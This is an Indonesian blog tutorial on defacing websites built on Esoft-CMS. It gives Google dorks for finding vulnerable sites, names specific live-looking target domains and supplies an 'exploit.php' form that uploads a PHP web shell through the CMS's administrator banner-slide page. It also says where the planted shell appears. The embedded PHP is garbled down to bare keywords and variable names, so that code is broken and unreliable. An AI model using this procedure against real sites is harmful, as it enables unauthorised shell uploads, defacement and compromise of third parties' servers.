Header Ads

Exploit Esoft-CMS Website Tutorial Vulnerable

Karna website www.dunia.digital lagi error , jadi saya pindahin aja artikelnya kesini , padahal domain dah beli 10 tahun . tapi yasudahlah . yang penting ilmunya , :)



Dunia.Digital Dari beberapa blog kemaren saya akhirnya membuat baru blog tentang serabutan , walaupun tetep membahas teknik hacking yang lagi tren ,

Sekarang Untuk Deface menggunakan teknik Esoft-CMS kalian harus punya :
1.Shell yang sudah tertanam
2.Dork Esoft-CMS
    - inurl:Esoft-cms intext:Log in or sign up
    - inurl:Esoft-cms intext:login

3.Shell yang mau di upload.php

Pertama Kita Cari Dulu website yang vuln , disini saya menggunakan dork  
inurl:Esoft-cms intext:Log in or sign up "


Disini saya pilih yang http://www.isofsglobal.org sebagai target percobaan.

sekarang kita masuk ke admin login nya , admin loginya biasanya ber URL : /hesoft-cms/

jadi tinggal tambahain aja sehingga menjadi   
http://mapleknit.com/esoft-cms/ 



Kalau sudah sampai sini , sekarang kalian buka shell yang kalian punya , (inget ya harus sudah punya shell) lalu bikin file exploit.php

lalu isi dengan code ini



<?php
if
$select
$pquery
if
$id1
}
$id1
$photo_name
if
$file
$upload_directory
$ext_str
$allowed_extensions
$max_file_size
$ext
if
echo
}
if
echo
}
$path
if
$uploadfile
}
else
echo
}
}
$slideshow_title
$sl_url
$position
$page
$insert
if
echo
}
else
echo
}
}
?>
<style type="text/css">
<!--
.style1 {color: #FF0000}
-->
</style>
<form action="http://alamatwebsitetarget.com/esoft-cms/administrator.php?admin_page=banner_slide.php&status=delete" method="post" enctype="multipart/form-data">
 Exploiter Esoft-cms |  AUTO SHELL UPLOAD | exploit Founded And Author By Eagle_One
  <br />
  <table border="1" class="slideshow_select_option" width="500">
  <tr>
    <td><p>Select Photo</p></td>
    <td><input type="file" name="sl_photo_browse"/></td>
  </tr>
  <tr>
    <td>Slide Caption</td>
    <td><textarea name="sl_photo_caption"> </textarea></td>
  </tr>
   <tr>
    <td>Slide position(home Page)</td>
    <td> <select name="position"> <option value=""> Select Option </option>
                  <option value="1"> Left Side </option>
                  <option value="2"> Right Side </option>
         </select>
       </td>
  </tr>
 <tr>
    <td>Slide position(Other Page)</td>
    <td>
       <select name="page"> <option value=""> Select Page Name </option>
<?php
$sql
$rec
$S
while
$S
?>
<?php
<?php
}
?>
         </select>
       </td>
  </tr>
   <tr>
  </tr>
  <tr>
    <td colspan="2"><input type="submit" name="seve_photo" class="log-twitter" value="Save Photo" /></td>
    </tr>
</table>
</form>
<?php
$photoid
$img
$pdelete
if
unlink
echo
}
}
?>
<?php
<?php
<br />
<h3>Edit or Delete Photo</h3>
<br />
<table width="500" border="1" style="font-size:12px;">
  <tr>
    <td width="50"><strong>Si. No</strong></td>
    <td width="50"><strong>Preview</strong></td>
    <td><strong> Caption </strong></td>
     <td><strong> Page </strong></td>
       
        <td width="80"><strong>Action</strong></td>
  </tr>
<?php
$querysli
$si_count
while
$si_count
?>
                <tr>
<?php
<?php
<?php
<?php
       
<?php
          </tr>
<?php
</table>
<?php
</form>


Ganti kata-kata yang diwarnai merah menjadi website yang ingin kalian deface

contohnya seperti ini dan save menjadi exploit.php


jika sudah dibuat saatnya buka shellkalian/exploit.php



Kalau langsung Ke direct ke halaman Admin seperti gambar dibawah ini Berarti SUKSES


Sekarang Tinggal Buka Deh Shell Kalian Yang Tertanam 

catatan : shell kalian ada dua kemungkinan di salah satu folder antara www.target.com/mhcms-admin/images/slideshow/randomname.php atau  www.target.com/esoft-cms/images/slideshow


kebetulan kali ini shell saya ada di folder http://www.isofsglobal.org/esoft-cms/images/slideshow/



tinggal buka deh :)



No comments

Powered by Blogger.